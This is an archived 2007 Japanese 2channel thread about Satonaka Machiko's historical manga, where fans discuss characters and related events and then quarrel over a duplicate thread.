100 :花と名無しさん:2007/09/02(日) 08:53:09 ID:???0
>>100
けじめとか、責任感とか皆無だよね。
そのくせ、自分一人だけが悩んでるような独白が多い。
だから十市って嫌われキャラになるんだと思う。

101 :花と名無しさん:2007/09/02(日) 11:35:00 ID:???0
やってることは紀と同じなんだが
紀は突き抜けたDQNすぎて
ほとんどギャグになってるからなあ

102 :花と名無しさん:2007/09/03(月) 15:11:44 ID:???0
紀は子どももいないし、最初から軽との交流なんて望めそうにない感じだった。
十市は、自分から嫁に行った、私は夫を大事にしてます的な顔をしてる、
自分だけが苦しんでるヒロインチック。その辺がダメなんだと思う。

103 :花と名無しさん:2007/09/04(火) 19:25:02 ID:???0
>>102
よっぽどのアホwww

104 :花と名無しさん:2007/09/05(水) 00:30:10 ID:???0
>>93
氷高といい、子孫に美女が多い辺り、顔たちは整っていたのかな>持統
イメージ的には、華やかな印象はないけれど。

倭姫は皇后になったけど、廃された皇后腹の内親王は皇后になれなかったのが
時代の移り変わりを感じる。

105 :花と名無しさん:2007/09/05(水) 13:43:58 ID:???0
>>104
酒人を無理に皇后にしても、井上の二の舞いになったと思う。
皇后位は得られなかったけれど、死後恐れられた井上に守られたかのように、
生を全う出来て良かったのかも知れない>酒人・朝原親子

106 :花と名無しさん:2007/09/08(土) 05:22:38 ID:???0
【山芋】孝謙称徳天皇スレ【道鏡】
http://academy6.2ch.net/test/read.cgi/history/1178961352

107 :花と名無しさん:2007/09/08(土) 11:36:21 ID:???0
平安貴族は銀英伝のゴールデンバウム朝下の貴族並みに素行が悪く
統治能力にも欠けていたのに4百年間も日本を支配していたのが謎
政治の実権は武家に奪われたとはいえ
鎌倉時代になっても経済力は維持していたし


108 :花と名無しさん:2007/09/08(土) 22:35:34 ID:???0
そこが天皇家が現在にいたるまで存続している理由

単なる権力者だけでなく権威=神道の総元締めとその藩屏 を背負っているからでない?
とはずかたりなんかみると、蒙古が攻めてくるという時期に、のんきに
源氏物語になぞらえた管弦の宴をひらいたりして、なんて呑気なと
思ったりするけれど、権力を(幕府に)取り上げられた彼らにとって
雅に遊ぶことしかできなかったのかもね。
そんな時代であっても、天皇にとって神事は最重要なお仕事だった。

109 :花と名無しさん:2007/09/09(日) 09:51:51 ID:???0
>>105 そうだよね。下手にトップに立たないほうが幸せってことあるよね。
天虹版氷上娘のように「私たちはその分気楽な身分」って割り切れば本当に申し分のない人生が送れる身分だものね。

愛より安定が大切な母親(氷上)。安定より愛が大事な娘(但馬)。対照的な親子だね。


110 :花と名無しさん:2007/09/09(日) 12:54:16 ID:???O
ちょいと報告。
7日の金曜から藤原京跡で「まるかじり!歩いてさらら藤原京」
っつ―イベントが開催されてるようだ。
親父が行って来てパンプ持って帰って来たが
里中たんのイラスト入り、インタビューも載っとるよ。
7日のオープニングイベントにはゲストで出席したみたい。
11月末頃まで開催されてるもよう。
探索コースは「讃良」「天武」「万葉歌人」「藤原氏」とあり内容はなかなか充実してそうだ。

111 :花と名無しさん:2007/09/09(日) 15:04:37 ID:???0
里中たんのイラスト入りと言えばマクドのチラシにもwww
やたら丸っこいタッチだったんで最初誰の絵かわからんかった

112 :花と名無しさん:2007/09/13(木) 00:45:20 ID:???0
ttp://www.fujiwarakyo.com/specialevent09.html

パンフデータ、ダウンロードできるよ。

113 :花と名無しさん:2007/09/18(火) 07:30:40 ID:???0
今更だけど、天上の虹バス情報

ttp://www.city.kashihara.nara.jp/seikatu/bus/index.html

114 :花と名無しさん:2007/09/22(土) 16:52:42 ID:???0
14が重複しているみたいだけどどっちも削除されず続いているのか

115 :花と名無しさん:2007/09/23(日) 09:39:22 ID:???0
こっちはバカの立てた隔離スレなんだよね。

116 :花と名無しさん:2007/09/27(木) 02:00:27 ID:???0
>>115こいつまだいたんだ?
あっちは荒らしのバカがこっちのテンプレに対抗して立てた重複スレなんだよねぇ
前スレログ見たらわかるんじゃないかと
こっちにちょくちょく来ては何か変な煽り残してく向こうの1
面白いから冷やかしに来てると称してこっちに粘着中w



117 :花と名無しさん:2007/09/27(木) 20:36:51 ID:???0
もうどっちもまったり進行してるから、別にどっちでもいいよ。


118 :花と名無しさん:2007/09/27(木) 20:42:26 ID:???0
他スレの住民にすれば鬱陶しいだろ…同時進行

119 :花と名無しさん:2007/09/28(金) 13:11:07 ID:???O
削除依頼出せばよい

120 :花と名無しさん:2007/09/28(金) 19:08:40 ID:???0
>>116
はっきり言って、こっちの方が嵐スレ。
注意事項の3とか、前スレの下らない私怨で書いてるとしか思えない。
こんなのを本スレにしないで済んでよかったよ。
だいたい、こっちの1が削除以来を出したけど、スルーされたんだよ。
あっちが重複スレじゃないと判断されたってこと。

まあ、ここはどうせろくに書き込みないんだし、
いずれあっちが終わったら再利用するってことで放置だね。

121 :花と名無しさん:2007/10/11(木) 11:57:15 ID:???O
dochi?

122 :花と名無しさん:2007/10/14(日) 13:47:43 ID:jMs9/H1J0
重複スレの話だけど(長文読めないゆとり脳はスルーしてね)
この漫画の読者がどっちもヲチってみて自分の使いたい方のスレを使えばいいじゃんかと
「本スレ(自称)」の方を使えと強制する権利もこっちのスレを削除しろと言う権限もありませんね
紛らわしくなったのは何を言っても後で重複スレ立てた方だしねw
それに荒らしがこっちのスレを立てたなんて人聞きが悪い
前スレみたいに荒れないようにとちょっとした注意書きに狂った様に反応して
後で重複スレ立てて「こっちが本スレだ」と主張するのは荒した本人だからかなw
同じスレタイが紛らわしければ自分の行く方だけブクマするか履歴に残しておけばいい話
初見の人には紛らわしいと思うけどそこはこのスレ最初から読んで好きな方に行ってくださいとしか言いようがないね

出来れば放置したいけど向こうの1かなんか知らんけどこっちを必死にヲチして煽ってかなりキモイ
まそんなキモオタが立てて張り付いてるウザイあっちのスレは見てないから
あっちが今どうなってるかなんて知りませんがw
あと私はしょっちゅう見に来ないんで
煽りや変なゴネレスしに来てもそう相手できませんので毎日反応チェックしに来ても無駄かと思いますw

123 :花と名無しさん:2007/10/14(日) 23:47:43 ID:???0
好きな方いつも見れるようにして使えばいいのよ。
偶然さっきTV付けたら2ch犬hkに先生出てんじゃんw
もう寝るから見れないけど古代史関連じゃなくて、働く女性の歴史についてのようですな。

124 :花と名無しさん:2007/10/15(月) 05:06:52 ID:???0
図々しい住人が二人いるらしいことは、わかったw
でも、なぜか両方のスレ共にちゃんと漫画の内容を語ってたりw
もう一つの後から立ってるスレの方が進行が早いのが謎だ。

125 :花と名無しさん:2007/10/15(月) 18:29:54 ID:???O
昨日NHK出てたけど
もう、おばあちゃんの年だと思うんだけど全然変わらないね
私が子供の頃から漫画家してるのに
整形でもしてるの?

126 :花と名無しさん:2007/10/20(土) 08:49:06 ID:???0
この人って所謂24年組世代?

127 :花と名無しさん:2007/10/21(日) 02:15:17 ID:???0
整形は先生もともとはブサじゃないから、
なんなんでしょうね?あの額田を思わせる若々しさは
女優さんばりにエステとかで若返りに金かけてそうですよね。

ところでこの漫画、晩年精神病んで死んでいくキャラ多くて萎えます
描写がリアルなだけに先生も精神的に参った時期を経験した人なのかと思ってしまうw
草壁は今で言う鬱だったのかな?13巻の壮絶な草壁の自殺で使ったあの毒
ふとどこで手に入れたのかが気になったw三千代の知り合いの医者の訳ないがw


128 :花と名無しさん:2007/10/21(日) 02:25:31 ID:???0
連投スマンです
意外だったのは、里中漫画のヒロインって前向きキャラ強いキャラのイメージが強いので
こういう漫画描く人ってそういう(極端な話)スポ根・軍隊的な根性論的思想の持ち主で
後ろ向きの駄目人間の気持ちって分からないタイプなんだろうなーと思ってたけど
13巻のアヘに草壁とは〜なのだとを語らせてる。ちゃんと弱い人間の心理も対処方法も的確に付いている。と草壁似の性格のわたくしには驚きだったw
先生の心理観察力描写力スゴスマンセー

129 :花と名無しさん:2007/10/22(月) 06:37:24 ID:???0
>>126
そうだよ。世代的にはそうなんだけど何故かそのカテゴリから外されてる一人。
里中って女性版水島漫画だからね。基本はスポ根。
それ故に正統派とみなされず、一条ゆかり等と同様に同世代の売れっ子作家で
ありながら、24年組には含まれず無視される事が多かった。
だから24年組への対抗心は強くて武宮の後を追いかけて文化人になりその後、大学教授に
なったりしてる。

130 :花と名無しさん:2007/10/22(月) 23:19:25 ID:???0
大学教授ってえらく権威も得たね。
大阪芸大か何かだったけかな?
昔の漫画の事はよくわからないんだけども、
先生のサイトのお友達漫画家リンクページに同世代の大御所と呼ばれる誰もが知ってそうな漫画家
(世代が違うのでよくわからんが池田理代子とか萩尾とか山岸とか)の公式サイトが不思議なぐらいなくて、
代わりに少年漫画家の大御所か名前も知らないようなマイナーな漫画家のサイトがあるのには激しく違和感があった(ついでに愛用の健康食品サイトとか)
あまり彼女ら他の大御所とは交流がないのかなと思ってたけど対抗心があるからなのw

131 :花と名無しさん:2007/10/23(火) 01:31:02 ID:???0
毎日自演で淋しいことだね。

132 :花と名無しさん:2007/10/23(火) 02:38:19 ID:???0
毎日荒らしオチで淋しいことだね。
暇人がw
住み分けの理屈が分からない馬鹿が読む漫画なのかねー

133 :花と名無しさん:2007/10/23(火) 02:48:13 ID:???0
なんでこんなクソスレが残ってるの?
本スレは向こうなんだし、こんなとこ削除するか沈めてしまえば?

134 :花と名無しさん:2007/10/23(火) 11:47:35 ID:???0
sage

135 :花と名無しさん:2007/10/23(火) 19:39:15 ID:eOV4Udap0
粘着ネタで荒れるの嫌だからこっちの住人してるんだけど。
どっちが本スレとかどうでもいいだろよ向こうの馬鹿スレ主w
自分の好きな方を本スレと思ってそこだけ見てればいいだろ馬鹿暇人w

ってこいつは話も人の言い分も聞く耳持たないただの粘着荒らしだから以後NGでw
住み分け出来ないんじゃなくてここ荒して潰すのが目的だもんねー
こいつをスルーが出来ない人はNG機能使ってね

136 :花と名無しさん:2007/10/23(火) 19:55:13 ID:eOV4Udap0
>>133
頭だけガキみたいなバカな中年の駄々があまりにも面白いので連投w
そんなに不満なら〜削除依頼スレに涙目で訴えてみれば?

削除依頼人『「荒らし」が 先 に 立てた「重複スレ」が気に入りませんし〜紛らわしくて邪魔だし
そのスレが存在する事自体気に入りませんw
その上そこを無視も出来なくてちょくちょくオチってしまうんですよねw結果余計ムカムカしてくるんですぅ〜wだから削除お願い』

削除人「ムカつくスレなら見なきゃ済む事でしょう。重複が紛らわしければ自分が本スレとしてる巣だけいつでも見れるように何とでも出来るでしょう。
それに先に立ったスレでちゃんとスレとして成り立ってるんでしょ?理由が幼稚かつヒステリック過ぎて却下ですね。塚頭悪杉」
「・・・・・・・wwww」削除依頼人涙目w

137 :花と名無しさん:2007/10/23(火) 20:03:20 ID:???0
>嵐
そっちがあまりにもしつこくこっちに粘着して妨害工作や荒らしすんなら
そっちの言い分なんてもう聞かないでこっちも徹底的に向こうを潰しにかかりますよ
なるべくめんどいからしたくないつか関わりたくないんだけどねーそんな暇じゃないし

138 :花と名無しさん:2007/10/23(火) 20:12:31 ID:???0

おk
荒らしのキーワードをNGした。

もうやめようよ。

139 :花と名無しさん:2007/10/23(火) 20:21:13 ID:???0
また荒れているようですが。。誰か”NG”とは何か愚かな私に教えてくださいませ。

140 :花と名無しさん:2007/10/23(火) 23:29:02 ID:???0
自分は両方見て書きたいときにレスしてるが
あっちもこっちもキチガイ君がまたファビョってるみたいだね。
カス男は女の上にすら立てないのに・・・

141 :花と名無しさん:2007/10/24(水) 19:51:50 ID:???0
あっちは別に荒れてないけど、里中作品から離れて専門的な歴史の話が続いてる。


142 :花と名無しさん:2007/10/25(木) 02:06:34 ID:???0
そしてこっちでは、このスレをバカにされるたび
「あっちの>>1がやったんだわ」と決め付けるキチガイが
暴れている。
よほどコンプレックスなんだろう。
>>137みたいな妄想も書いているが、
実際には、ここのスレの誰かが、
「あちらのスレを削除しろ!」と訴えでて無視されたんだよ。
あっちのスレでは、こんな隔離スレ相手にしてないっぽいw

143 :花と名無しさん:2007/10/25(木) 02:09:45 ID:???0
>>141
こっちでは、日本史の話どころか漫画の話も自演以外ほとんどかかれてない。
あちらの本スレを敵視したわけのわからん罵言が書かれてるだけ。
すでに誰にも「里中スレ」とは思われていない罠。

144 :花と名無しさん:2007/10/26(金) 00:25:41 ID:???0
>>137の「こっちも徹底的に向こうを潰しにかかりますよ」って実際、どうするつもりなんだろね?
どっちのスレにもあんまり執着がない立場からすると、お手並みを見てみたい気もするw

145 :花と名無しさん:2007/10/26(金) 11:05:13 ID:Z1u+4IXV0

>>139

|| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
|| ○荒らしは[放置]が一番キライ。荒らしは常に誰かの反応を待っています。
|| ○放置された荒らしは[煽り]や[自作自演]であなたのレスを誘います。
||  乗せられてレスしたらその時点であなたの負け。
|| ○2chブラウザを使うと板に優しくて(・∀・)イイ!!
||     http://www.monazilla.org/
|| ○透明アボーン等の機能も有効活用しましょう。
|| ○荒しはまとめてゴミ箱へ。
|| ○[反撃]は荒らしの滋養にして栄養であり最も喜ぶことです。荒らしにエサを
||  与えないで下さい。                   Λ_Λ
|| ○枯死するまで孤独に暴れさせておいて   \ (゚ー゚*) キホン。
||  ゴミが溜まったら削除が一番です。       ⊂⊂ |
||___ ∧ ∧__∧ ∧__ ∧ ∧_      | ̄ ̄ ̄ ̄|
     (  ∧ ∧__ (   ∧ ∧__(   ∧ ∧      ̄ ̄ ̄
   〜(_(  ∧ ∧_ (  ∧ ∧_ (  ∧ ∧  
     〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)  >は〜い、先生。
       〜(___ノ  〜(___ノ   〜(___ノ


146 :花と名無しさん:2007/10/26(金) 11:27:46 ID:???0
>>141
>あっちは別に荒れてないけど、里中作品から離れて専門的な歴史の話が続いてる。

向こうは見てもねーから実情は知らないけど
そういう歴史ウンチク自慢ばかしだとツマンネ上に(虹や里中作品語りスレだしね)
1が最初から開き直って重複スレ立ててキモイし
しかもずっと張り付いてるぽいからますます電波スレとしてスルーでおkだなあっちはw
1の自演なり歴史語り好き同士なりで勝手に盛り上がってればいいよw

>>142
相手にされてない隔離スレなら見にくんな馬鹿w
コンプも何も向こうがどうなってるかどんだけ伸びてるかなんて興味もねーから知らんよ
そっちこそ何でこっちをいちいち気にして絡んでんの?そっちがコンプじゃね?w
マジで矛盾ばっかで話通じないお子様脳ね〜ただの嵐だと思うけど本気でやってるなら可哀相な人だ
きっと不幸で孤独な人生歩んで来てそうなったんだろーねw


結論は気に入らないスレは見ない見たいスレだけ見れるようにする
お互いに干渉しない煽りが来たら放置かNGにすればおk

147 :花と名無しさん:2007/10/29(月) 14:59:44 ID:???0
きっと




どちらかが


間違っている


148 :花と名無しさん:2007/10/29(月) 21:01:07 ID:???0
まあ、最近のこっちのスレは書いてる人間の人格が見えて、
そういう意味では向こうより興味深いねw

50 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)